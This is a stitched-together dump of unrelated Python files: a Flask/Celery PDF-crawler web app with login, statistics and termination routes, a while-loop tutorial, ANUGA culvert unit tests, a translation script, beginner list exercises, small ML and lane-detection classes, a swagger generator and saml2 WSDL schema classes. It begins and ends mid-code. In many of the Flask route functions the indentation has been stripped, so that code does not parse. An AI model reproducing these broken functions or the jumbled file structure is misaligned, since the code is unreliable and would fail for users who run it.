    module-level crawl limits from the form, validate the URL, then either
    warn about a recent crawl of the same domain or redirect to /crawling.
    """
    form = CrawlForm(request.form)
    if request.method == 'POST' and form.validate():
        # Change global variables depending on input
        global MAX_CRAWLING_DURATION, MAX_CRAWL_DEPTH, MAX_CRAWL_SIZE, MB_CRAWL_SIZE, PDF_TO_PROCESS
        # Get Form Fields and update variables
        url = form.url.data
        crawl_again = request.form['crawl_again']
        MAX_CRAWL_DEPTH = form.depth.data
        MB_CRAWL_SIZE = form.size.data
        MAX_CRAWL_SIZE = 1024 * 1024 * MB_CRAWL_SIZE
        MAX_CRAWLING_DURATION = form.time.data * 60
        PDF_TO_PROCESS = form.pdf.data
        # Check if valid URL with function in helper module
        status_code = url_status(url)
        if status_code == -1:
            flash('Impossible to establish contact to given URL, check for typos and format.', 'danger')
            return render_template('home.html', most_recent_url="none", form=form)
        # Bug fix: the original used `is not` here, comparing object identity
        # of ints, which is implementation-dependent; use `!=` for equality.
        elif status_code != requests.codes.ok:
            flash('Contact to given url was established, but received back the following status code: '
                  + str(status_code) + '. (Only status code 200 is accepted at the moment)', 'danger')
            return render_template('home.html', most_recent_url="none", form=form)
        # Extract domain name out of url and save in session
        parsed = urlparse(url)
        domain = parsed.netloc
        session['domain'] = domain
        session['url'] = url
        # Check if stats already exist about this domain
        # Create cursor
        cur = mysql.connection.cursor()
        # Get highest crawl_id from the last CRAWL_REPETITION_WARNING_TIME days
        result = cur.execute("""SELECT COALESCE(MAX(cid), 0) as cid FROM Crawls WHERE domain = %s
        AND (crawl_date > DATE_SUB(now(), INTERVAL %s DAY))""", (domain, CRAWL_REPETITION_WARNING_TIME))
        cid = cur.fetchone()["cid"]
        # Closing cursor apparently not needed when using this extension
        if crawl_again != "True" and cid != 0:
            # There was a previous crawl, make button appear to view corresponding stats
            flash("This domain was already crawled in the last " + str(CRAWL_REPETITION_WARNING_TIME) + " days, "
                  + "you have the option to directly view the most recent statistics or restart the crawling process.",
                  "info")
            return render_template('home.html', most_recent_url=url_for("cid_statistics", cid=cid), form=form)
        return redirect(url_for('crawling'))
    return render_template('home.html', most_recent_url="none", form=form)
# Crawling
@app.route('/crawling')
@is_logged_in
def crawling():
    """
    Kick off a crawl: acquire the single-user lock, clear old data, schedule
    the crawling Celery task, and render the live progress page. The task id
    and start time are stashed in the session for later interruption.
    """
    # Check no crawling in progress
    if not lock.acquire(False):
        # Failed to lock the resource
        flash(Markup('There are already Tasks scheduled, please wait before running another query or '
                     'terminate all running processes <a href="/advanced" class="alert-link">here.</a>'), 'danger')
        return redirect(url_for('index'))
    else:
        try:
            # delete previously crawled data
            # (delete_data is presumably defined elsewhere in this module)
            delete_data()
            # STEP 0: TimeKeeping
            session['crawl_start_time'] = time.time()
            # STEP 1: Prepare WGET command
            url = session.get('url', None)
            post_url = url_for('event', _external=True)
            # STEP 2: Schedule celery task
            result = crawling_task.delay(url=url, post_url=post_url, domain=session.get('domain', ''),
                                         max_crawl_duration=MAX_CRAWLING_DURATION,
                                         max_crawl_depth=MAX_CRAWL_DEPTH,
                                         max_crawl_size=MAX_CRAWL_SIZE)
            session['crawling_id'] = result.id
            return render_template('crawling.html',
                                   max_crawling_duration=MAX_CRAWLING_DURATION,
                                   max_crawl_depth=MAX_CRAWL_DEPTH,
                                   max_crawl_size=MAX_CRAWL_SIZE)
        except Exception as e:
            # Call Terminate function to make sure all started tasks are terminated and lock released
            terminate()
            flash("An error occurred : " + str(e), 'danger')
            return redirect(url_for('index'))
# End Crawling manually
@app.route('/crawling/end')
@is_logged_in
def end_crawling():
# STEP 0: check crawling process exists
if session.get('crawling_id', 0) is 0:
flash("There is no crawling process to kill", 'danger')
return redirect(url_for('index'))
# STEP 1: Kill only subprocess, and the celery process will then recognize it and terminate too
celery_id = session.get('crawling_id', 0) # get saved celery task id
try:
# This is a hack to kill the spawned subprocess and not only the celery task
# I read that in some cases the subprocess doesn't get terminated when the Celery task is revoked,
# though I never observed this behavior.
pid = crawling_task.AsyncResult(celery_id).info.get('pid') # get saved subprocess id
os.kill(pid, signal.SIGTERM) # kill subprocess
except AttributeError:
flash("Either the task was not scheduled yet, is already over, or was interrupted from someone else"
" and thus interruption is not possible", 'danger')
return redirect(url_for('index'))
# STEP 2: TimeKeeping
crawl_start_time = session.get('crawl_start_time', None)
session['crawl_total_time'] = time.time() - crawl_start_time
# STEP 3: Successful interruption
session['crawling_id'] = 0 # remove crawling id
flash('You successfully manually interrupted the crawler.', 'success')
# STEP 4: Release Lock
try:
lock.release()
except RuntimeError:
pass
return render_template('end_crawling.html')
# End Crawling automatically, for this to work the client must still have the tab open !
@app.route('/crawling/autoend')
@is_logged_in
def autoend_crawling():
    """Handle the crawler stopping on its own (requires the client tab open).

    Records timing, reports why the crawl ended and moves on to table
    detection.
    """
    # STEP 1: timekeeping
    started = session.get('crawl_start_time', None)
    elapsed = time.time() - started
    session['crawl_total_time'] = elapsed
    crawled_size = dir_size(WGET_DATA_PATH + "/" + session.get('domain'))
    # STEP 2: pick the message explaining why the crawl stopped
    if elapsed > MAX_CRAWLING_DURATION:
        reason = 'Time limit reached - Crawler interrupted automatically'
    elif crawled_size > MAX_CRAWL_SIZE:
        reason = "Size limit reached - Crawler interrupted automatically"
    else:
        reason = ("Crawled all PDFs until depth of " + str(MAX_CRAWL_DEPTH)
                  + " - Crawler interrupted automatically")
    flash(reason, 'success')
    session['crawling_id'] = 0  # remove crawling id
    # STEP 3: release the lock (ignore if it was not held)
    try:
        lock.release()
    except RuntimeError:
        pass
    return redirect(url_for("table_detection"))
# Start table detection
@app.route('/table_detection')
@is_logged_in
def table_detection():
# First check if lock can be acquired
if not lock.acquire(False):
# Failed to lock the resource
flash(Markup('There are already Tasks scheduled, please wait before running another query or '
'terminate all running processes <a href="/advanced" class="alert-link">here.</a>'), 'danger')
return redirect(url_for('index'))
else:
try:
# Step 0: take start time and prepare arguments
processing_start_time = time.time()
domain = session.get('domain', None)
url = session.get('url', None)
crawl_total_time = session.get('crawl_total_time', 0)
post_url = url_for('event', _external=True)
path = WGET_DATA_PATH + '/' + domain
count = 0
file_array = []
# STEP 1: Find PDF we want to process
for dir_, _, files in os.walk(path):
for fileName in files:
if ".pdf" in fileName and count < PDF_TO_PROCESS:
rel_file = os.path.join(dir_, fileName)
file_array.append(rel_file)
count += 1
# STEP 2: Prepare a celery task for every pdf and then a callback to store result in db
header = (tabula_task.s(f, post_url) for f in file_array)
callback = pdf_stats.s(domain=domain, url=url, crawl_total_time=crawl_total_time, post_url=post_url,
processing_start_time=processing_start_time)
# STEP 3: Run the celery Chord
chord(header)(callback)
# STEP 4: If query was empty go straight further
if count == 0:
return redirect(url_for('processing'))
return render_template('table_detection.html', total_pdf=count)
except Exception as e:
# If something goes wrong make sure all tasks get revoked and lock released
terminate()
flash("Something went wrong: " + str(e) + " --- All tasks were revoked and the lock released")
# End of PDF processing (FIXME name not very fitting anymore)
@app.route('/processing')
@is_logged_in
def processing():
# Release lock
try:
lock.release()
except RuntimeError:
pass
return render_template('processing.html', domain=session.get('domain', ''), )
# Last Crawl Statistics
@app.route('/statistics')
def statistics():
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
cur.execute("""SELECT cid FROM Crawls WHERE crawl_date = (SELECT max(crawl_date) FROM Crawls)""")
result = cur.fetchone()
# Close connection
cur.close()
if result:
cid_last_crawl = result["cid"]
return redirect(url_for("cid_statistics", cid=cid_last_crawl))
else:
flash("There are no statistics to display, please start a new query and wait for it to complete.", "danger")
return redirect(url_for("index"))
# CID specific Statistics
@app.route('/statistics/<int:cid>')
def cid_statistics(cid):
# STEP 1: retrieve all saved stats from DB
# Create cursor
cur = mysql.connection.cursor()
cur.execute("""SELECT * FROM Crawls WHERE cid = %s""", (cid,))
crawl = cur.fetchone()
# Get stats by getting all individual files
cur.execute("""SELECT url, stats FROM Files f JOIN Crawlfiles cf ON f.fid = cf.fid WHERE cid = %s""",
(cid,))
stats_db = cur.fetchall()
stats = {}
for stat in stats_db:
stats[stat['url']] = json.loads(stat['stats'])
# Close connection
cur.close()
# STEP 2: do some processing to retrieve interesting info from stats
json_hierarchy = json.loads(crawl['hierarchy'])
stats_items = stats.items()
n_tables = sum([subdict['n_tables'] for filename, subdict in stats_items])
n_rows = sum([subdict['n_table_rows'] for filename, subdict in stats_items])
n_pages = sum([subdict['n_pages'] for filename, subdict in stats_items])
medium_tables = sum([subdict['table_sizes']['medium'] for filename, subdict in stats_items])
small_tables = sum([subdict['table_sizes']['small'] for filename, subdict in stats_items])
large_tables = sum([subdict['table_sizes']['large'] for filename, subdict in stats_items])
# Find some stats about creation dates
creation_dates_pdf = [subdict['creation_date'] for filename, subdict in stats_items]
creation_dates = list(map(lambda s: pdf_date_format_to_datetime(s), creation_dates_pdf))
disk_size = round(crawl['disk_size'] / (1024*1024), 1)
if len(creation_dates) > 0:
oldest_pdf = min(creation_dates)
most_recent_pdf = max(creation_dates)
else:
oldest_pdf = "None"
most_recent_pdf = "None"
return render_template('statistics.html', cid=cid, n_files=crawl['pdf_crawled'], n_success=crawl['pdf_processed'],
n_tables=n_tables, n_rows=n_rows, n_errors=crawl['process_errors'], domain=crawl['domain'],
small_tables=small_tables, medium_tables=medium_tables,
large_tables=large_tables, stats=json.dumps(stats, sort_keys=True, indent=4),
hierarchy=json_hierarchy, end_time=crawl['crawl_date'],
crawl_total_time=round(crawl['crawl_total_time'] / 60.0, 1),
proc_total_time=round(crawl['proc_total_time'] / 60.0, 1),
oldest_pdf=oldest_pdf, most_recent_pdf=most_recent_pdf, disk_size=disk_size,
n_pages=n_pages)
# Form to check User registration data
class RegisterForm(Form):
    """WTForms form validating the user registration data."""
    name = StringField('Name', [validators.Length(min=1, max=50)])
    username = StringField('Username', [validators.Length(min=4, max=25)])
    email = StringField('Email', [validators.Length(min=6, max=50)])
    # 'password' must equal the 'confirm' field; the message is flashed on mismatch.
    password = PasswordField('Password', [validators.DataRequired(),
                                          validators.EqualTo('confirm', message='Passwords do not match')])
    confirm = PasswordField('Confirm Password')
# Register
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST' and form.validate():
name = form.name.data
email = form.email.data
username = form.username.data
password = sha256_crypt.encrypt(str(form.password.data))
# Create cursor
cur = mysql.connection.cursor()
# Execute query
cur.execute("""INSERT INTO Users(name, email, username, password) VALUES(%s, %s, %s, %s)""",
(name, email, username, password))
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
flash('You are now registered and can log in', 'success')
return redirect(url_for('login'))
return render_template('register.html', form=form)
# User login
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
# Get Form Fields
username = request.form['username']
password_candidate = request.form['password']
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
result = cur.execute("""SELECT * FROM Users WHERE username = %s""", [username])
# Note: apparently this is safe from SQL injections see
# https://stackoverflow.com/questions/7929364/python-best-practice-and-securest-to-connect-to-mysql-and-execute-queries/7929438#7929438
if result > 0:
# Get stored hash
data = cur.fetchone() # FIXME username should be made primary key
password = data['password']
# Compare passwords
if sha256_crypt.verify(password_candidate, password):
# Check was successful -> create session variables
session['logged_in'] = True
session['username'] = username
flash('You are now logged in', 'success')
return redirect(url_for('index'))
else:
error = 'Invalid login'
return render_template('login.html', error=error)
else:
error = 'Username not found'
return render_template('login.html', error=error)
# Note: Closing connection not necessary when using flask mysql db extension
return render_template('login.html')
# Delete Crawl
@app.route('/delete_crawl', methods=['POST'])
@is_logged_in
def delete_crawl():
try:
# Get Form Fields
cid = request.form['cid']
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
cur.execute("""DELETE FROM Crawls WHERE cid = %s""", (cid,))
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
flash('Crawl successfully removed', 'success')
return redirect(url_for('dashboard'))
except Exception as e:
flash('An error occurred while trying to delete the crawl: ' + str(e), 'danger')
redirect(url_for('dashboard'))
# Logout
@app.route('/logout')
@is_logged_in
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
# Dashboard
@app.route('/dashboard')
def dashboard():
# Create cursor
cur = mysql.connection.cursor()
# Get Crawls
result = cur.execute("""SELECT cid, crawl_date, pdf_crawled, pdf_processed, domain, url FROM Crawls""")
crawls = cur.fetchall()
if result > 0:
return render_template('dashboard.html', crawls=crawls)
else:
msg = 'No Crawls Found'
return render_template('dashboard.html', msg=msg)
# Advanced
@app.route('/advanced')
@is_logged_in
def advanced():
return render_template('advanced.html')
# Release lock and Terminate all background tasks
@app.route('/terminate')
@is_logged_in
def terminate():
# Purge all tasks from task queue
command = shlex.split(VIRTUALENV_PATH + " -f -A bar.celery purge") #FIXME datapath variable
subprocess.Popen(command)
# Kill all Celery tasks that have an ETA or are scheduled for later processing
i = celery.control.inspect()
scheduled_tasks = i.scheduled()
# FIXME don't replicate same code 3 times
for workers in scheduled_tasks:
for j in range(0, len(scheduled_tasks[workers])):
celery.control.revoke(scheduled_tasks[workers][j]['id'], terminate=True)
# Kill all Celery tasks that are currently active.
active_tasks = i.active()
for workers in active_tasks:
for j in range(0, len(active_tasks[workers])):
celery.control.revoke(active_tasks[workers][j]['id'], terminate=True)
# Kill all Celery tasks that have been claimed by workers
reserved_tasks = i.reserved()
for workers in reserved_tasks:
for j in range(0, len(reserved_tasks[workers])):
celery.control.revoke(reserved_tasks[workers][j]['id'], terminate=True)
# Release Lock if locked
try:
lock.release()
except RuntimeError:
pass
# Broadcast the termination messages to users that were potentially still observing task progress
socketio.emit('redirect', {'url': 'terminated'})
# Flash success message
flash("All processes were interrupted and the lock released !", 'success')
return redirect(url_for('advanced'))
# Page displayed when process terminated by other user
@app.route('/terminated')
@is_logged_in
def terminated():
return render_template('terminated.html')
# Empty all Tables except for User data
@app.route('/empty_tables')
@is_logged_in
def empty_tables():
# Create cursor
cur = mysql.connection.cursor()
# Truncate all tables, necessary trick because of constrained table
# https://stackoverflow.com/questions/5452760/how-to-truncate-a-foreign-key-constrained-table
cur.execute("""SET FOREIGN_KEY_CHECKS = 0""")
cur.execute("""TRUNCATE TABLE Crawlfiles""")
cur.execute("""TRUNCATE TABLE Crawls""")
cur.execute("""TRUNCATE TABLE Files""")
cur.execute("""SET FOREIGN_KEY_CHECKS = 1""")
# Close connection
cur.close()
flash("All tables were emptied !", 'success')
return redirect(url_for('advanced'))
# About
@app.route('/about')
def about():
return render_template('about.html')
# Delete Crawled PDFs
@app.route('/delete_data', methods=['GET', 'POST'])
@is_logged_in
def delete_data():
# Taken from https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
folder = WGET_DATA_PATH
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
print(e)
return "Crawled data deleted successfully"
# Download JSON hierarchy
@app.route('/hierarchy/<int:cid>')
@is_logged_in
def hierarchy_download(cid):
# Get JSON string
# Create cursor
cur = mysql.connection.cursor()
# Get Crawls
result = cur.execute("""SELECT hierarchy FROM Crawls WHERE cid = %s""", (cid,))
if not result > 0:
return
hierarchy = cur.fetchone()['hierarchy']
return Response(hierarchy,
mimetype='application/json',
headers={'Content-Disposition': 'attachment;filename=hierarchy.json'})
# Download any logfile
@app.route('/log/<string:lid>')
@is_logged_in
def log_download(lid):
if lid in switcher:
return send_file(switcher.get(lid))
else:
flash('An error occurred while trying to download log', 'error')
return redirect(url_for('advanced'))
# Delete any logfile
@app.route('/log_del/<string:lid>')
@is_logged_in
def log_delete(lid):
if lid in switcher:
open(switcher.get(lid), 'w').close()
flash('Log was successfully emptied', 'success')
return redirect(url_for('advanced'))
else:
flash('An error occurred while trying to delete log', 'error')
return redirect(url_for('advanced'))
# Used to easily emit WebSocket messages from inside tasks
# Pattern taken from https://github.com/jwhelland/flask-socketio-celery-example/blob/master/app.py
@app.route('/event/', methods=['POST'])
def event():
    """Relay a JSON-posted event to WebSocket clients (used by Celery tasks).

    Pattern taken from
    https://github.com/jwhelland/flask-socketio-celery-example/blob/master/app.py
    """
    payload = request.json
    if not payload:
        return 'error', 404
    socketio.emit(payload['event'], payload['data'])
    return 'ok'
# ----------------------------- ASYNCHRONOUS COMMUNICATION ------------------------------------------------------------
# Note: these are not crucial at the moment,
# though it would be nice to direct messages to clients instead of broadcasting.
@socketio.on('connect')
def test_connect():
    """Acknowledge a newly connected WebSocket client."""
    emit('my_response', {'data': 'Connected', 'count': 0})
@socketio.on('disconnect')
def test_disconnect():
    """Log the session id of a disconnecting WebSocket client."""
    print('Client disconnected', request.sid)
# ----------------------------- RUNNING APPLICATION -------------------------------------------------------------------
if __name__ == '__main__':
    # Run through socketio so WebSocket support is enabled alongside Flask.
    socketio.run(app)
|
# A `while` loop keeps executing its body as long as the condition is true;
# it stops once the condition becomes false.
s = 4
while s > 1:
    print(s)
    s = s - 1  # the decrement is required to avoid an infinite loop
print("first while loop execution is done")
# Skipping a value: only numbers different from 3 are printed.
t = 5
while t > 1:
    if t != 3:
        print(t)
    t = t - 1
print('second while loop execution is done')
# break: leaves the entire loop as soon as the condition is met;
# commonly used when searching for a certain element in a collection.
u = 10
while u > 1:
    if u == 7:
        break
    print(u)
    u = u - 1
print('third while loop execution is done')
# continue: skips the rest of the current iteration and proceeds to the next.
# Multiple `if` conditions can coexist in one while loop.
v = 10
while v > 1:
    if v == 9:
        # Decrement BEFORE `continue`, otherwise the loop would be stuck at 9
        # forever; 9 itself is skipped and never printed.
        v = v - 1
        continue
    if v == 6:
        break
    print(v)
    v = v - 1
print('fourth while loop execution is done')
#!/usr/bin/env python
from anuga.culvert_flows.culvert_polygons import *
import unittest
import os.path
from anuga.geometry.polygon import inside_polygon, polygon_area
class Test_poly(unittest.TestCase):
    """Tests for create_culvert_polygons: exchange polygons must have positive
    area and enquiry points must lie outside them."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_1(self):
        # Projected map coordinates of the two culvert ends — presumably a
        # real-world (UTM-like) site; TODO confirm datum in anuga docs.
        end_point0=[307138.813,6193474]
        end_point1=[307150.563,6193469]
        width=3
        height=3
        number_of_barrels=1
        P = create_culvert_polygons(end_point0,
                                    end_point1,
                                    width=width,
                                    height=height,
                                    number_of_barrels=number_of_barrels)
        # Compute area and check that it is greater than 0
        for key1 in ['exchange_polygon0',
                     'exchange_polygon1']:
            polygon = P[key1]
            area = polygon_area(polygon)
            msg = 'Polygon %s ' %(polygon)
            msg += ' has area = %f' % area
            assert area > 0.0, msg
        # NOTE(review): 'polygon' here is whatever the loop above left bound
        # (exchange_polygon1) — enquiry points are only checked against that
        # one polygon; confirm this is intentional.
        for key2 in ['enquiry_point0', 'enquiry_point1']:
            point = P[key2]
            assert len(inside_polygon(point, polygon)) == 0

    def test_2(self):
        #end_point0=[307138.813,6193474]
        #end_point1=[307150.563,6193469]
        # Same checks as test_1, but with small local coordinates and a
        # narrow, tall culvert.
        end_point0=[10., 5.]
        end_point1=[10., 10.]
        width = 1
        height = 3.5
        number_of_barrels=1
        P = create_culvert_polygons(end_point0,
                                    end_point1,
                                    width=width,
                                    height=height,
                                    number_of_barrels=number_of_barrels)
        # Compute area and check that it is greater than 0
        for key1 in ['exchange_polygon0',
                     'exchange_polygon1']:
            polygon = P[key1]
            area = polygon_area(polygon)
            msg = 'Polygon %s ' % (polygon)
            msg += ' has area = %f' % area
            assert area > 0.0, msg
        # NOTE(review): same as test_1 — only the last polygon is checked.
        for key2 in ['enquiry_point0', 'enquiry_point1']:
            point = P[key2]
            assert len(inside_polygon(point, polygon)) == 0
#-------------------------------------------------------------
if __name__ == "__main__":
    # unittest.makeSuite was deprecated for years and removed in Python 3.13;
    # TestLoader.loadTestsFromTestCase is the supported equivalent (it selects
    # the same methods: those whose names start with 'test').
    suite = unittest.TestLoader().loadTestsFromTestCase(Test_poly)
    runner = unittest.TextTestRunner()
    runner.run(suite)
|
#!/usr/bin/python3
"""Translate messages.json using Google Translate.
The `trans` tool can be found here:
https://www.soimort.org/translate-shell/
or on Debian systems:
$ sudo apt-get install translate-shell
"""
import collections
import json
import os
import shutil
import subprocess
import sys
# Maps a locale directory name (under _locales/) to the target-language
# argument passed to the `trans` CLI tool. A falsy value would make main()
# skip that locale with an "unknown lang" message.
LANG_MAP = {
    'ar': 'arabic',
    'bg': 'Bulgarian',
    'ca': 'Catalan',
    'cs': 'Czech',
    'da': 'Danish',
    'de': 'german',
    'el': 'Greek',
    'es': 'spanish',
    'es_419': 'spanish',
    'et': 'Estonian',
    'fa': 'Persian',
    'fi': 'finnish',
    'fil': 'tgl',
    'fr': 'french',
    'he': 'Hebrew',
    'hi': 'Hindi',
    'hr': 'Croatian',
    'hu': 'Hungarian',
    'id': 'Indonesian',
    'it': 'italian',
    'ja': 'japanese',
    'ko': 'Korean',
    'lt': 'Lithuanian',
    'lv': 'Latvian',
    'ms': 'Malay',
    'nl': 'Dutch',
    'no': 'Norwegian',
    'pl': 'Polish',
    'pt_BR': 'pt',
    'pt_PT': 'Portuguese',
    'ro': 'Romanian',
    'ru': 'Russian',
    'sk': 'Slovak',
    'sl': 'Slovenian',
    'sr': 'sr-Cyrl',
    'sv': 'Swedish',
    'th': 'Thai',
    'tr': 'Turkish',
    'uk': 'Ukrainian',
    'vi': 'Vietnamese',
    'zh_CN': 'zh-CN',
    'zh_TW': 'zh-TW',
}
def load(lang):
    """Read <lang>/messages.json, preserving the key order of the file."""
    path = '%s/messages.json' % lang
    with open(path) as fp:
        decoder = json.JSONDecoder(object_pairs_hook=collections.OrderedDict)
        return decoder.decode(fp.read())
def trans_one(lang, msg):
    """Translate one English string via the external `trans` CLI tool."""
    cmd = ['trans', '-b', '-s', 'en', '-t', LANG_MAP[lang], msg]
    raw = subprocess.check_output(cmd)
    return raw.decode('utf-8').strip()
def trans(lang, en_data, data):
    """Return a copy of *data* where every message present in *en_data* but
    missing from *data* has been machine-translated."""
    merged = data.copy()
    for key in en_data.keys():
        if key in data:
            continue
        entry = collections.OrderedDict()
        entry['message'] = trans_one(lang, en_data[key]['message'])
        # Descriptions are developer-facing; keep them in English.
        entry['description'] = en_data[key]['description']
        merged[key] = entry
    return merged
def format(data):
    """Serialize *data* as pretty, non-ASCII-escaped JSON.

    NOTE: shadows the builtin `format`; name kept for existing callers.
    """
    pretty = json.dumps(data, ensure_ascii=False, indent=2)
    return pretty
def save(lang, data):
    """Atomically write *data* to <lang>/messages.json (temp file + move)."""
    print('saving: %s' % lang)
    path = '%s/messages.json' % lang
    tmp_path = path + '.tmp'
    with open(tmp_path, 'w') as fp:
        fp.write(format(data))
    shutil.move(tmp_path, path)
def main(argv):
    """Fill in missing translations for every locale under _locales/."""
    locales_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                               '_locales')
    os.chdir(locales_dir)
    en_data = load('en')
    for lkey, lname in LANG_MAP.items():
        if not lname:
            print('unknown lang: %s' % lkey)
            continue
        print('checking', lname)
        data = load(lkey)
        new_data = trans(lkey, en_data, data)
        # Only rewrite the file when something actually changed.
        if data != new_data:
            save(lkey, new_data)
if __name__ == '__main__':
    # Propagate main's return value as the process exit code (None -> 0).
    sys.exit(main(sys.argv[1:]))
|
# ********************************************************************
# Countdown - Create a function that accepts a number as an input. Return a new list that counts down by one,
# from the number (as the 0th element) down to 0 (as the last element).
# Example: countdown(5) should return [5,4,3,2,1,0]
def countdown(num):
    """Return [num, num-1, ..., 1, 0]."""
    return list(range(num, -1, -1))

print(countdown(5))
# Print and Return - Create a function that will receive a list with two numbers. Print the first value and return the second.
# Example: print_and_return([1,2]) should print 1 and return 2
def print_return(list):
    """Print the first element of *list* and return the second.

    NOTE: the parameter name shadows the builtin `list`; kept for interface
    compatibility.
    """
    first, second = list[0], list[1]
    print(first)
    return second

print(print_return([2, 3]))
# First Plus Length - Create a function that accepts a list and returns the sum of the first value in the list plus the list's length.
# Example: first_plus_length([1,2,3,4,5]) should return 6 (first value: 1 + length: 5)
def first_p_length(list):
    """Return the first element of *list* plus the list's length.

    NOTE: the parameter name shadows the builtin `list`; kept for interface
    compatibility.
    """
    return list[0] + len(list)

print(first_p_length([30, 22, 4, 52, 3]))
# This Length, That Value - Write a function that accepts two integers as parameters:
# size and value. The function should create and return a list whose length is equal to the given size,
# and whose values are all the given value.
# Example: length_and_value(4,7) should return [7,7,7,7]
# Example: length_and_value(6,2) should return [2,2,2,2,2,2]
def size_and_value(size, value):
    """Return a list of length *size* whose elements are all *value*."""
    return [value] * size

print(size_and_value(6, 4))
|
"""
abstraction of a lane line
"""
class LaneLine(object):
    """Abstraction of a single detected lane line."""

    def __init__(self):
        # Polynomial fit coefficients, x pixel positions, y sample values and
        # radius of curvature; all unset until a detection pass fills them in.
        self.fit = None
        self.x = None
        self.yvals = None
        self.curverad = None

    def reset(self):
        """Discard detection state; x/yvals restart as fresh empty lists."""
        self.x = []
        self.yvals = []
        self.fit = None
        self.curverad = None
import numpy as np
class Transformer:
    """Identity transformer: pass-through hooks plus 2-D reshaping helpers."""

    def transform_X(self, X):
        """Return the features unchanged (override point for subclasses)."""
        return X

    def transform_y(self, y):
        """Return the targets unchanged (override point for subclasses)."""
        return y

    def format_X(self, X):
        """Reshape X into a (num_samples, num_features) ndarray."""
        num_samples = len(X)
        num_features = len(X[0])
        return np.reshape(X, [num_samples, num_features])

    def format_y(self, y):
        """Reshape y into a (num_samples, num_targets) ndarray."""
        # BUG FIX: removed leftover debug statement print('y', y) that
        # polluted stdout on every call.
        num_samples = len(y)
        num_targets = len(y[0])
        return np.reshape(y, [num_samples, num_targets])
|
# -*- coding: utf-8 -*-
"""
@author: Chris Lucas
"""
import os
from flask import json
from app import app, api
# Where the generated swagger description is written, relative to this file.
OUTPUT = 'static/swagger.json'

# SESLR_APP_MODE selects the deployment prefix: 'prod' is served at the root,
# any other mode under '/<mode>'. Raises KeyError if the variable is unset.
mode = os.environ['SESLR_APP_MODE']
mode = '/' + mode if mode != 'prod' else ''
base_path = '{}/api/'.format(mode)

os.makedirs(os.path.dirname(OUTPUT), exist_ok=True)

# A request context is needed for the api schema to be built.
with app.test_request_context():
    swagger = api.__schema__
swagger['basePath'] = base_path

with open(OUTPUT, 'w') as f:
    f.write(json.dumps(
        swagger,
        sort_keys=True,
        indent=4,
        separators=(',', ': ')
    ))
|
#!/usr/bin/env python
#
# Generated Fri May 27 17:23:42 2011 by parse_xsd.py version 0.4.
#
import saml2
from saml2 import SamlBase
from saml2.schema import wsdl
NAMESPACE = "http://schemas.xmlsoap.org/wsdl/soap/"
class EncodingStyle_(SamlBase):
    """The http://schemas.xmlsoap.org/wsdl/soap/:encodingStyle element"""

    c_tag = "encodingStyle"
    c_namespace = NAMESPACE
    # Copy the parent registries so class-level additions never mutate SamlBase.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def encoding_style__from_string(xml_string):
    """Parse *xml_string* into an EncodingStyle_ instance."""
    return saml2.create_class_from_xml_string(EncodingStyle_, xml_string)
class TStyleChoice_(SamlBase):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tStyleChoice element"""

    c_tag = "tStyleChoice"
    c_namespace = NAMESPACE
    # String value restricted by the schema to "rpc" or "document".
    c_value_type = {"base": "xs:string", "enumeration": ["rpc", "document"]}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def t_style_choice__from_string(xml_string):
    """Parse *xml_string* into a TStyleChoice_ instance."""
    return saml2.create_class_from_xml_string(TStyleChoice_, xml_string)
class TOperation_(wsdl.TExtensibilityElement_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tOperation element"""

    c_tag = "tOperation"
    c_namespace = NAMESPACE
    c_children = wsdl.TExtensibilityElement_.c_children.copy()
    c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
    c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
    c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
    # XML attribute name -> (python attribute name, type, required)
    c_attributes["soapAction"] = ("soap_action", "anyURI", False)
    c_attributes["style"] = ("style", TStyleChoice_, False)

    def __init__(
        self,
        soap_action=None,
        style=None,
        required=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        wsdl.TExtensibilityElement_.__init__(
            self,
            required=required,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.soap_action = soap_action
        self.style = style
def t_operation__from_string(xml_string):
    """Parse *xml_string* into a TOperation_ instance."""
    return saml2.create_class_from_xml_string(TOperation_, xml_string)
class UseChoice_(SamlBase):
    """The http://schemas.xmlsoap.org/wsdl/soap/:useChoice element"""

    c_tag = "useChoice"
    c_namespace = NAMESPACE
    # String value restricted by the schema to "literal" or "encoded".
    c_value_type = {"base": "xs:string", "enumeration": ["literal", "encoded"]}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def use_choice__from_string(xml_string):
    """Parse *xml_string* into a UseChoice_ instance."""
    return saml2.create_class_from_xml_string(UseChoice_, xml_string)
class TFaultRes_(SamlBase):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tFaultRes element"""

    c_tag = "tFaultRes"
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # XML attribute name -> (python attribute name, type, required).
